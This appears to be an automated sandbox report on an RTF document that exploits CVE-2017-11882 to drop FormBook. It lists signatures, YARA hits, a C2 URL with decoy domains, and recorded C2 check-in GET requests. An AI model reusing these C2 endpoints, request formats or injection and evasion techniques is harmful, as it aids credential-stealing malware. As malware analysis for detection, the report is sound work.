Windows Analysis Report
SecuriteInfo.com.Exploit.Rtf.Obfuscated.32.1905.19912

Overview

General Information

Sample Name:	SecuriteInfo.com.Exploit.Rtf.Obfuscated.32.1905.19912 (renamed file extension from 19912 to rtf)
Analysis ID:	680528
MD5:	8bfea104ae681494896379e3c647f6ae
SHA1:	aaf97d8a987c5060ff06c4031030000d53d3cb31
SHA256:	2975edb12c8e70b56a89c7fb82e4eb347b992b4147dcfa2a20efd16d54c33eb4
Tags:	rtf
Infos:

Detection

FormBook

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Document exploit detected (drops PE files)

Document contains OLE streams which likely are hidden ActiveX objects

System process connects to network (likely due to code injection or exploit)

Document exploit detected (creates forbidden files)

Antivirus detection for URL or domain

Antivirus detection for dropped file

Snort IDS alert for network traffic

Multi AV Scanner detection for submitted file

Yara detected FormBook

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Maps a DLL or memory area into another process

Document contains OLE streams with names of living off the land binaries

Found potential equation exploit (CVE-2017-11882)

Injects a PE file into a foreign processes

Tries to detect virtualization through RDTSC time measurements

Creates a thread in another existing process (thread injection)

Uses ipconfig to lookup or modify the Windows network settings

PE file contains section with special chars

Sample uses process hollowing technique

Office process drops PE file

Writes to foreign memory regions

Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)

Modifies the prolog of user mode functions (user mode inline hooks)

Queues an APC in another process (thread injection)

PE file has nameless sections

Machine Learning detection for dropped file

Modifies the context of a thread in another process (thread injection)

C2 URLs / IPs found in malware configuration

Found suspicious RTF objects

Antivirus or Machine Learning detection for unpacked file

May sleep (evasive loops) to hinder dynamic analysis

Uses code obfuscation techniques (call, push, ret)

Detected potential crypto function

Sample execution stops while process was sleeping (likely an evasion)

HTTP GET or POST without a user agent

Document misses a certain OLE stream usually present in this Microsoft Office document type

Contains long sleeps (>= 3 min)

Potential document exploit detected (unknown TCP traffic)

Drops PE files

Tries to load missing DLLs

Contains functionality to read the PEB

Checks if the current process is being debugged

Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)

Creates a process in suspended mode (likely to inject code)

Queries the volume information (name, serial number etc) of a device

Yara signature match

PE file contains sections with non-standard names

Internet Provider seen in connection with other malware

Found potential string decryption / allocating functions

Contains functionality to call native functions

Potential document exploit detected (performs DNS queries)

Contains functionality for execution timing, often used to detect debuggers

Document contains Microsoft Equation 3.0 OLE entries

Enables debug privileges

Found inlined nop instructions (likely shell or obfuscated code)

Office Equation Editor has been started

Creates a window with clipboard capturing capabilities

Potential document exploit detected (performs HTTP gets)

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Signatures

AV Detection

Antivirus detection for URL or domain

Source: www.lundadonate.xyz/nb30/

Avira URL Cloud: Label: malware

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{4F98E955-E40B-4BEE-AA1E-253D7E3CD6E7}.tmp

Avira: detection malicious, Label: EXP/CVE-2017-11882.Gen

Multi AV Scanner detection for submitted file

Source: SecuriteInfo.com.Exploit.Rtf.Obfuscated.32.1905.rtf	Virustotal: Detection: 43%			Perma Link
Source: SecuriteInfo.com.Exploit.Rtf.Obfuscated.32.1905.rtf	ReversingLabs: Detection: 21%

Yara detected FormBook

Source: Yara match	File source: 9.0.notepad.exe.400000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.0.notepad.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.0.notepad.exe.400000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.notepad.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.notepad.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.0.notepad.exe.400000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.0.notepad.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.0.notepad.exe.400000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.0.notepad.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.0.notepad.exe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.0.notepad.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.0.notepad.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.0.notepad.exe.400000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000009.00000002.1043439197.0000000000150000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000000.948702057.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000000.947984971.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.1175369847.0000000000260000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.1043648372.00000000002C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000000.939194134.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000000.938868025.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.1043727096.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.1175496063.0000000000290000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000000.948326848.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.958771208.0000000003666000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.1175083933.0000000000080000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000000.987721089.0000000002992000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000000.1004582452.0000000002992000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\Client.exe

ReversingLabs: Detection: 24%

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\Client.exe

Joe Sandbox ML: detected

Antivirus or Machine Learning detection for unpacked file

Source: 9.0.notepad.exe.400000.0.unpack	Avira: Label: TR/Crypt.ZPACK.Gen
Source: 9.2.notepad.exe.400000.1.unpack	Avira: Label: TR/Crypt.ZPACK.Gen
Source: 9.0.notepad.exe.400000.3.unpack	Avira: Label: TR/Crypt.ZPACK.Gen
Source: 9.0.notepad.exe.400000.4.unpack	Avira: Label: TR/Crypt.ZPACK.Gen
Source: 9.0.notepad.exe.400000.1.unpack	Avira: Label: TR/Crypt.ZPACK.Gen
Source: 9.0.notepad.exe.400000.5.unpack	Avira: Label: TR/Crypt.ZPACK.Gen
Source: 9.0.notepad.exe.400000.2.unpack	Avira: Label: TR/Crypt.ZPACK.Gen

Source: 00000009.00000002.1043439197.0000000000150000.00000040.10000000.00040000.00000000.sdmp

Malware Configuration Extractor: FormBook {"C2 list": ["www.lundadonate.xyz/nb30/"], "decoy": ["p5w.top", "5tfg.com", "anicehost.net", "willsmalaysia.com", "yothisnox.com", "arripro.com", "etherhacker.net", "best-boy.net", "ppcrecruits.net", "sportsplaymaker.app", "indovanilla.net", "srsimmons.co.uk", "ahulubicyclecompany.com", "4lifegeneration.com", "asiasbodyscrubs.com", "allianceocm.com", "gadstrackingtool.site", "nycityspaces.com", "wsdldc.com", "paradise-unlimited.com", "h-language.com", "socialautopost.com", "facebfree.com", "rccl.tech", "ottomakeup.store", "top-softwarereviews.com", "buy-refrigerators.site", "dhglassbottle.com", "justcallmet3.online", "ce-chen-photography.com", "premierdealznext.online", "jnfbhch.com", "3dherders.com", "mejoresmoviles.top", "401by.com", "ynnanjiu.com", "hgirejr.space", "therapeuticdetailing.com", "nowinnofeeteam.co.uk", "banhtrangmuoitayninh.com", "xrhealthinstitute.com", "theilluminati.online", "opimprovements.co.uk", "altoonahanggliding.com", "yellowcottagedoor.com", "11111111111112000.top", "arlowepeak.com", "topbettingoffers.online", "geekmortgages.com", "casasyterrenosjalisco.info", "predicadores.online", "yuntiwang.top", "shanhaiverse.net", "wonderslots-fun.online", "droxgiy.online", "thebluejaysnest.net", "shenlongdian.com", "wf825.com", "urlasuite.xyz", "abundant-life-coach.com", "asd811.xyz", "fc10086.com", "thegoldencamel.online", "pqkjl.com"]}

Exploits

Found potential equation exploit (CVE-2017-11882)

Source:

Static RTF information: Object: 1 Offset: 001DC2BCh

Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Windows\SysWOW64\cmd.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Windows\SysWOW64\cmd.exe			Jump to behavior

Document contains Microsoft Equation 3.0 OLE entries

Source: ~WRF{4F98E955-E40B-4BEE-AA1E-253D7E3CD6E7}.tmp.0.dr

Stream path '_1721489049/\x1CompObj' : ...................F....Microsoft Equation 3.0....

Office Equation Editor has been started

Source: unknown

Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Source:	Binary string: ipconfig.pdb source: notepad.exe, 00000009.00000003.1040858153.000000000081C000.00000004.00000020.00020000.00000000.sdmp, notepad.exe, 00000009.00000002.1043409063.0000000000030000.00000040.10000000.00040000.00000000.sdmp, notepad.exe, 00000009.00000002.1044510525.0000000000822000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: ipconfig.pdbN source: notepad.exe, 00000009.00000003.1040858153.000000000081C000.00000004.00000020.00020000.00000000.sdmp, notepad.exe, 00000009.00000002.1043409063.0000000000030000.00000040.10000000.00040000.00000000.sdmp, notepad.exe, 00000009.00000002.1044510525.0000000000822000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: notepad.pdb source: ipconfig.exe, 0000000B.00000002.1177312343.000000000271F000.00000004.10000000.00040000.00000000.sdmp, ipconfig.exe, 0000000B.00000002.1175813159.0000000000444000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: notepad.exe, notepad.exe, 00000009.00000003.950924763.0000000000900000.00000004.00000800.00020000.00000000.sdmp, notepad.exe, 00000009.00000002.1046378480.0000000000C10000.00000040.00000800.00020000.00000000.sdmp, notepad.exe, 00000009.00000003.949038674.00000000002A0000.00000004.00000800.00020000.00000000.sdmp, notepad.exe, 00000009.00000002.1044571883.0000000000A90000.00000040.00000800.00020000.00000000.sdmp, ipconfig.exe, 0000000B.00000002.1176285668.0000000002220000.00000040.00000800.00020000.00000000.sdmp, ipconfig.exe, 0000000B.00000003.1044991591.0000000002090000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: notepad.pdbx source: ipconfig.exe, 0000000B.00000002.1177312343.000000000271F000.00000004.10000000.00040000.00000000.sdmp, ipconfig.exe, 0000000B.00000002.1175813159.0000000000444000.00000004.00000020.00020000.00000000.sdmp

Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 66.235.200.170:80
Source: global traffic	TCP traffic: 66.235.200.170:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 66.235.200.170:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 66.235.200.170:80
Source: global traffic	TCP traffic: 66.235.200.170:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 66.235.200.170:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 66.235.200.170:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 66.235.200.170:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 66.235.200.170:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 66.235.200.170:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 66.235.200.170:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 66.235.200.170:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 66.235.200.170:80
Source: global traffic	TCP traffic: 66.235.200.170:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 66.235.200.170:80
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 104.167.67.175:80
Source: global traffic	TCP traffic: 104.167.67.175:80 -> 192.168.2.22:49172
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 104.167.67.175:80
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 104.167.67.175:80
Source: global traffic	TCP traffic: 104.167.67.175:80 -> 192.168.2.22:49172
Source: global traffic	TCP traffic: 104.167.67.175:80 -> 192.168.2.22:49172
Source: global traffic	TCP traffic: 104.167.67.175:80 -> 192.168.2.22:49172
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 104.167.67.175:80
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 104.167.67.175:80
Source: global traffic	TCP traffic: 104.167.67.175:80 -> 192.168.2.22:49172

Source: global traffic	DNS query: name: www.thegoldencamel.online
Source: global traffic	DNS query: name: www.best-boy.net

Source: C:\Windows\SysWOW64\notepad.exe	Code function: 4x nop then pop ebx	9_2_00407B44
Source: C:\Windows\SysWOW64\notepad.exe	Code function: 4x nop then pop ebx	9_2_00407B1C
Source: C:\Windows\SysWOW64\notepad.exe	Code function: 4x nop then pop edi	9_2_0040E47A

Source: C:\Windows\explorer.exe	Domain query: www.best-boy.net
Source: C:\Windows\explorer.exe	Network Connect: 104.167.67.175 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 66.235.200.170 80	Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: www.thegoldencamel.online

Source: Traffic	Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49171 -> 66.235.200.170:80
Source: Traffic	Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49171 -> 66.235.200.170:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49171 -> 66.235.200.170:80
Source: Traffic	Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49172 -> 104.167.67.175:80
Source: Traffic	Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49172 -> 104.167.67.175:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49172 -> 104.167.67.175:80

Source: global traffic	HTTP traffic detected: GET /nb30/?4hntpZ=HrFg7Zw77Q4AgN6xWDdwD99B0qzSSsTIjhXIVaLmDYdCsLEuJk5C8qRmA5PaAiVsBqYing==&PPa=ApcXW2 HTTP/1.1Host: www.thegoldencamel.onlineConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /nb30/?4hntpZ=WWLsvV61WazOGjhWPmK2zCox7nD1HU3ZrNfLe9lvYYokad8918qHb5Jmu9JsRIh/3onKEQ==&PPa=ApcXW2 HTTP/1.1Host: www.best-boy.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

Source: Joe Sandbox View	ASN Name: ESITEDUS ESITEDUS
Source: Joe Sandbox View	ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS

Source: explorer.exe, 0000000A.00000000.970687640.00000000046D0000.00000002.00000001.00040000.00000000.sdmp	String found in binary or memory: http://computername/printers/printername/.printer
Source: explorer.exe, 0000000A.00000000.1030986946.0000000003B10000.00000002.00000001.00040000.00000000.sdmp	String found in binary or memory: http://investor.msn.com
Source: explorer.exe, 0000000A.00000000.1030986946.0000000003B10000.00000002.00000001.00040000.00000000.sdmp	String found in binary or memory: http://investor.msn.com/
Source: explorer.exe, 0000000A.00000000.1027469570.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.984634900.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.999499813.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.954363521.0000000000335000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://java.sun.com
Source: explorer.exe, 0000000A.00000000.1005858941.0000000003CF7000.00000002.00000001.00040000.00000000.sdmp	String found in binary or memory: http://localizability/practices/XML.asp
Source: explorer.exe, 0000000A.00000000.1005858941.0000000003CF7000.00000002.00000001.00040000.00000000.sdmp	String found in binary or memory: http://localizability/practices/XMLConfiguration.asp
Source: explorer.exe, 0000000A.00000000.957907821.0000000001DD0000.00000002.00000001.00040000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: Client.exe, 00000006.00000002.951081960.0000000002641000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: explorer.exe, 0000000A.00000000.973857047.0000000006450000.00000002.00000001.00040000.00000000.sdmp	String found in binary or memory: http://servername/isapibackend.dll
Source: explorer.exe, 0000000A.00000000.1005858941.0000000003CF7000.00000002.00000001.00040000.00000000.sdmp	String found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
Source: explorer.exe, 0000000A.00000000.970687640.00000000046D0000.00000002.00000001.00040000.00000000.sdmp	String found in binary or memory: http://treyresearch.net
Source: explorer.exe, 0000000A.00000000.970687640.00000000046D0000.00000002.00000001.00040000.00000000.sdmp	String found in binary or memory: http://wellformedweb.org/CommentAPI/
Source: explorer.exe, 0000000A.00000000.1005858941.0000000003CF7000.00000002.00000001.00040000.00000000.sdmp	String found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
Source: explorer.exe, 0000000A.00000000.957907821.0000000001DD0000.00000002.00000001.00040000.00000000.sdmp	String found in binary or memory: http://www.%s.comPA
Source: explorer.exe, 0000000A.00000000.1027469570.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.984634900.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.999499813.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.954363521.0000000000335000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.autoitscript.com/autoit3
Source: explorer.exe, 0000000A.00000000.970687640.00000000046D0000.00000002.00000001.00040000.00000000.sdmp	String found in binary or memory: http://www.expedia.com/pub/agent.dll?qscr=mcst&strt1=%1&city1=%2&stnm1=%4&zipc1=%3&cnty1=5?http://ww
Source: explorer.exe, 0000000A.00000000.1030986946.0000000003B10000.00000002.00000001.00040000.00000000.sdmp	String found in binary or memory: http://www.hotmail.com/oe
Source: explorer.exe, 0000000A.00000000.1005858941.0000000003CF7000.00000002.00000001.00040000.00000000.sdmp	String found in binary or memory: http://www.icra.org/vocabulary/.
Source: explorer.exe, 0000000A.00000000.970687640.00000000046D0000.00000002.00000001.00040000.00000000.sdmp	String found in binary or memory: http://www.iis.fhg.de/audioPA
Source: explorer.exe, 0000000A.00000000.1030986946.0000000003B10000.00000002.00000001.00040000.00000000.sdmp	String found in binary or memory: http://www.msnbc.com/news/ticker.txt
Source: explorer.exe, 0000000A.00000000.979092097.00000000084C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.962364346.0000000002CBF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.1030297831.0000000002CBF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.1012512071.000000000869E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.1012445260.0000000008675000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.1012221961.0000000008617000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.979280066.00000000084D2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.996182777.0000000008617000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.piriform.com/ccleaner
Source: explorer.exe, 0000000A.00000000.980217883.0000000008617000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.1012221961.0000000008617000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.996182777.0000000008617000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.piriform.com/ccleaner1SPS0
Source: explorer.exe, 0000000A.00000000.996446358.0000000008675000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.1011537608.00000000084D2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.995286555.00000000084D2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.996486805.000000000869E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.980535513.0000000008675000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.980217883.0000000008617000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.1012512071.000000000869E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.1012445260.0000000008675000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.979280066.00000000084D2000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
Source: explorer.exe, 0000000A.00000000.969152262.0000000004385000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.piriform.com/ccleanerp
Source: explorer.exe, 0000000A.00000000.1004860034.0000000002CBF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.988141924.0000000002CBF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.962364346.0000000002CBF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.1030297831.0000000002CBF000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.piriform.com/ccleanerq
Source: explorer.exe, 0000000A.00000000.969152262.0000000004385000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.1007082449.0000000004385000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.991189675.0000000004385000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.1032583619.0000000004385000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.piriform.com/ccleanerv
Source: explorer.exe, 0000000A.00000000.1030986946.0000000003B10000.00000002.00000001.00040000.00000000.sdmp	String found in binary or memory: http://www.windows.com/pctv.
Source: explorer.exe, 0000000A.00000000.1027469570.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.984634900.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.999499813.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.954363521.0000000000335000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org
Source: explorer.exe, 0000000A.00000000.1027469570.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.984634900.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.999499813.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.954363521.0000000000335000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org
Source: explorer.exe, 0000000A.00000000.1027469570.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.984634900.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.999499813.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.954363521.0000000000335000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/firefox/52.0.1/releasenotes

Source: SecuriteInfo.com.Exploit.Rtf.Obfuscated.32.1905.rtf, type: SAMPLE	Matched rule: Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents. Author: ditekSHen
Source: 9.0.notepad.exe.400000.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 9.0.notepad.exe.400000.3.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 9.0.notepad.exe.400000.3.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 9.0.notepad.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 9.0.notepad.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 9.0.notepad.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 9.0.notepad.exe.400000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 9.0.notepad.exe.400000.2.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 9.0.notepad.exe.400000.2.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 9.2.notepad.exe.400000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 9.2.notepad.exe.400000.1.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 9.2.notepad.exe.400000.1.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 9.2.notepad.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 9.2.notepad.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 9.2.notepad.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 9.0.notepad.exe.400000.3.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 9.0.notepad.exe.400000.3.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 9.0.notepad.exe.400000.3.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 9.0.notepad.exe.400000.4.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 9.0.notepad.exe.400000.4.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 9.0.notepad.exe.400000.4.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 9.0.notepad.exe.400000.5.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 9.0.notepad.exe.400000.5.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 9.0.notepad.exe.400000.5.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 9.0.notepad.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 9.0.notepad.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 9.0.notepad.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 9.0.notepad.exe.400000.5.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 9.0.notepad.exe.400000.5.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 9.0.notepad.exe.400000.5.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 9.0.notepad.exe.400000.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 9.0.notepad.exe.400000.2.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 9.0.notepad.exe.400000.2.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
